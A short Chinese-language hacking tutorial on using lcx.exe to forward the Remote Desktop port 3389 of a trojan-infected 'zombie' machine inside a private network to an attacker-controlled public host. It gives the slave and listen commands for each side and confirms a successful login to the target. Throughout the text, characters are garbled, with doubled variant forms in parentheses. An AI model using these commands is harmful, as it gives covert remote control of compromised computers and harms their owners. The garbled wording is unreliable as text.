端口轉(zhuǎn)發(fā)（Port forwarding），有時被叫做隧道，是安全殼(SSH) 為網(wǎng)絡(luò)安全通信使用的一種方法。端口轉(zhuǎn)發(fā)是轉(zhuǎn)發(fā)一個網(wǎng)絡(luò)端口從一個網(wǎng)絡(luò)節(jié)點到另一個網(wǎng)絡(luò)節(jié)點的行為，其使一個外部用戶從外部經(jīng)過一個被激活的NAT路由器到達(dá)一個在私有內(nèi)部IP地址（局域網(wǎng)內(nèi)部）上的一個端口。

這里我就用工具是Lcx，Lcx.exe是一個端口轉(zhuǎn)發(fā)工具，相當(dāng)于把肉雞A上的3389端口轉(zhuǎn)發(fā)到具有外網(wǎng)IP地址的B機(jī)上，這樣連接B機(jī)的3389端口就相當(dāng)于鏈接A機(jī)的3389端口。Lcx程序多用于被控制計算機(jī)(肉雞)處于內(nèi)網(wǎng)的情況，被控制機(jī)可能中了木馬程序，雖然能夠進(jìn)行控制，但還是沒有使用遠(yuǎn)程終端登陸到本機(jī)進(jìn)行管理方便，因此在很多情況下，都會想方設(shè)法在被控制計算機(jī)上開啟3389端口，然后通過lcx等程序進(jìn)行端口轉(zhuǎn)發(fā)，進(jìn)而在本地連接到被控制計算機(jī)的遠(yuǎn)程終端并進(jìn)行管理和使用。

先開啟 Windows xp 查看內(nèi)網(wǎng)IP信息

在目標(biāo)機(jī)器上執(zhí)行l(wèi)cx.exe -slave 公網(wǎng)ip 端口 內(nèi)網(wǎng)ip 端口

例如：lcx.exe –slave 154.223.*.* 51 192.168.*.* 3389 將內(nèi)網(wǎng)的3389端口轉(zhuǎn)發(fā)到公網(wǎng)的51端口

然后在公網(wǎng)的機(jī)器上：Lcx.exe –listen 監(jiān)聽51端口，轉(zhuǎn)發(fā)到公網(wǎng)機(jī)器的3389端口

例如：Lcx.exe –listen 51 3389

這個時候已經(jīng)將內(nèi)網(wǎng)的3389轉(zhuǎn)發(fā)到了公網(wǎng)機(jī)器的3389端口，我們在本地機(jī)器上遠(yuǎn)程公網(wǎng)IP 3389 ，就連接上了內(nèi)網(wǎng)機(jī)器的3389，此時已經(jīng)成功登陸進(jìn)來，我們查看IP，可以看到是目標(biāo)機(jī)器。

附件：lcx.rar